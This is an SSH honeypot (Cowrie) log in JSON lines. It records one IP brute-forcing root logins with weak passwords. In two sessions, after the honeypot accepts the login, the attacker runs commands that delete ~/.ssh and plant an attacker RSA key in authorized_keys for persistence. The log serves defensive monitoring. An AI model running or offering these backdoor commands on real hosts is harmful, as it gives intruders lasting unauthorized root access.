{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:49:11.520157Z","src_ip":"212.227.235.229","session":"89a9b060c4b0"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:49:11.770328Z","src_ip":"212.227.235.229","session":"89a9b060c4b0"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:49:11.774822Z","src_ip":"212.227.235.229","session":"e1c85bd91be6"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:49:15.573606Z","src_ip":"212.227.235.229","session":"d10489e14309"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:49:57.847418Z","src_ip":"212.227.235.229","session":"c417d01bc113"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37592,"dst_ip":"1.2.3.4","dst_port":22,"session":"54c15ee99c05","protocol":"ssh","message":"New connection: 212.227.235.229:37592 (1.2.3.4:22) [session: 54c15ee99c05]","sensor":"my-vps","timestamp":"2025-08-26T12:50:21.321352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:50:21.322709Z","src_ip":"212.227.235.229","session":"54c15ee99c05"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:50:21.565570Z","src_ip":"212.227.235.229","session":"54c15ee99c05"}
{"eventid":"cowrie.login.success","username":"root","password":"@Tx123456","message":"login attempt [root/@Tx123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:50:22.577514Z","src_ip":"212.227.235.229","session":"54c15ee99c05"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:50:23.125314Z","src_ip":"212.227.235.229","session":"54c15ee99c05"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:50:23.126019Z","src_ip":"212.227.235.229","session":"54c15ee99c05"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:50:23.126940Z","src_ip":"212.227.235.229","session":"54c15ee99c05"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:50:23.371063Z","src_ip":"212.227.235.229","session":"54c15ee99c05"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:50:23.876236Z","src_ip":"212.227.235.229","session":"54c15ee99c05"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:50:23.876936Z","src_ip":"212.227.235.229","session":"54c15ee99c05"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:50:24.122220Z","src_ip":"212.227.235.229","session":"54c15ee99c05"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:50:24.123127Z","src_ip":"212.227.235.229","session":"54c15ee99c05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39604,"dst_ip":"1.2.3.4","dst_port":22,"session":"697e45148f5f","protocol":"ssh","message":"New connection: 212.227.235.229:39604 (1.2.3.4:22) [session: 697e45148f5f]","sensor":"my-vps","timestamp":"2025-08-26T12:50:24.374429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:50:24.375157Z","src_ip":"212.227.235.229","session":"697e45148f5f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:50:24.624381Z","src_ip":"212.227.235.229","session":"697e45148f5f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T12:50:25.662779Z","src_ip":"212.227.235.229","session":"697e45148f5f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55480,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfcb1f9dfefc","protocol":"ssh","message":"New connection: 212.227.235.229:55480 (1.2.3.4:22) [session: dfcb1f9dfefc]","sensor":"my-vps","timestamp":"2025-08-26T12:50:26.370333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:50:26.371290Z","src_ip":"212.227.235.229","session":"dfcb1f9dfefc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:50:26.634525Z","src_ip":"212.227.235.229","session":"dfcb1f9dfefc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:50:26.913349Z","src_ip":"212.227.235.229","session":"697e45148f5f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41546,"dst_ip":"1.2.3.4","dst_port":22,"session":"214342b9c0fb","protocol":"ssh","message":"New connection: 212.227.235.229:41546 (1.2.3.4:22) [session: 214342b9c0fb]","sensor":"my-vps","timestamp":"2025-08-26T12:50:27.163174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:50:27.164037Z","src_ip":"212.227.235.229","session":"214342b9c0fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:50:27.414155Z","src_ip":"212.227.235.229","session":"214342b9c0fb"}
{"eventid":"cowrie.login.failed","username":"omid","password":"123","message":"login attempt [omid/123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:50:27.726189Z","src_ip":"212.227.235.229","session":"dfcb1f9dfefc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:50:28.456356Z","src_ip":"212.227.235.229","session":"214342b9c0fb"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:50:28.703128Z","src_ip":"212.227.235.229","session":"54c15ee99c05"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:50:28.707882Z","src_ip":"212.227.235.229","session":"214342b9c0fb"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:50:28.991145Z","src_ip":"212.227.235.229","session":"dfcb1f9dfefc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33826,"dst_ip":"1.2.3.4","dst_port":22,"session":"80d181fe8571","protocol":"ssh","message":"New connection: 212.227.235.229:33826 (1.2.3.4:22) [session: 80d181fe8571]","sensor":"my-vps","timestamp":"2025-08-26T12:51:39.963811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:51:39.964725Z","src_ip":"212.227.235.229","session":"80d181fe8571"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:51:40.206850Z","src_ip":"212.227.235.229","session":"80d181fe8571"}
{"eventid":"cowrie.login.success","username":"root","password":"P@$$w0rd@123","message":"login attempt [root/P@$$w0rd@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:51:41.219691Z","src_ip":"212.227.235.229","session":"80d181fe8571"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:51:41.770911Z","src_ip":"212.227.235.229","session":"80d181fe8571"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:51:41.771584Z","src_ip":"212.227.235.229","session":"80d181fe8571"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:51:41.772408Z","src_ip":"212.227.235.229","session":"80d181fe8571"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:51:42.015560Z","src_ip":"212.227.235.229","session":"80d181fe8571"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:51:42.518036Z","src_ip":"212.227.235.229","session":"80d181fe8571"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:51:42.518716Z","src_ip":"212.227.235.229","session":"80d181fe8571"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:51:42.762789Z","src_ip":"212.227.235.229","session":"80d181fe8571"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:51:42.763763Z","src_ip":"212.227.235.229","session":"80d181fe8571"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36164,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb0a8866a3cd","protocol":"ssh","message":"New connection: 212.227.235.229:36164 (1.2.3.4:22) [session: eb0a8866a3cd]","sensor":"my-vps","timestamp":"2025-08-26T12:51:43.009175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:51:43.010028Z","src_ip":"212.227.235.229","session":"eb0a8866a3cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:51:43.255378Z","src_ip":"212.227.235.229","session":"eb0a8866a3cd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T12:51:44.276546Z","src_ip":"212.227.235.229","session":"eb0a8866a3cd"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:51:45.523068Z","src_ip":"212.227.235.229","session":"eb0a8866a3cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38022,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c65cac89162","protocol":"ssh","message":"New connection: 212.227.235.229:38022 (1.2.3.4:22) [session: 9c65cac89162]","sensor":"my-vps","timestamp":"2025-08-26T12:51:45.759212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:51:45.760489Z","src_ip":"212.227.235.229","session":"9c65cac89162"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:51:46.001287Z","src_ip":"212.227.235.229","session":"9c65cac89162"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:51:47.008322Z","src_ip":"212.227.235.229","session":"9c65cac89162"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:51:47.250880Z","src_ip":"212.227.235.229","session":"9c65cac89162"}
